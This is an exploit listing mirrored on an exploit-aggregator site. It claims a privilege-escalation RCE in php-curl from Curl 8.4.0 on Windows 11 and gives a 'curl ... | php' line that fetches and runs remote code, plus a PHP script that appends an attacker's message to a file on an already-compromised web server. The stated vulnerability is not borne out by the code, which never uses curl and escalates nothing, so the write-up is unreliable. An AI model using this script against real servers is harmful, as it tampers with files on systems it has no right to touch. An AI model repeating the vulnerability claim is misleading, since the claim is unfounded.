Advertisement






PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE

CVE Category Price Severity
Not available CWE-306 Not disclosed High
Author Risk Exploitation Type Date
Unknown High Local 2023-12-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120010

Below is a copy:

PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE
## Title: PHP8: php-curl from Curl-8.4.0 Windows11 Privilage-Escalation RCE
## Author: nu11secur1ty
## Date: 12/04/2023
## Vendor: https://www.php.net/manual/en/function.curl-close
## Software: https://www.php.net/manual/en/book.curl.php
## Reference: https://portswigger.net/web-security/access-control

## Description:
A successful attack can be possible when the attacker is hacking the Windows web server, like XAMPP, IIS, or just some LAMP service.
The attacker must find a weak sanitizing function to upload the malicious PHP exploit and exploit this vulnerability. 

STATUS: MEDIUM-HIGH Vulnerability

[+]Exploit execution:

```curl
 curl -s https://victim.com/your_exploit.php | php
```
[+] Exploit:
```PHP
<?php
// This variable has content, which content is your target after you upload the exploit.
$file = 'Your\Windows\Server\environment\target\file.something';
// The new content to add to the file
$person = "Your_message_for_the_victim\n";
// Write the contents to the file, 
// using the FILE_APPEND flag to append the content to the end of the file
// and the LOCK_EX flag to prevent anyone else writing to the file at the same time
file_put_contents($file, $person, FILE_APPEND | LOCK_EX);
echo "Done, the exploit is successfully deployed!"
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/PHP8-Curl)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/php8-php-curl-rce-privilage-escalation.html)

## Time spent:
03:17:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.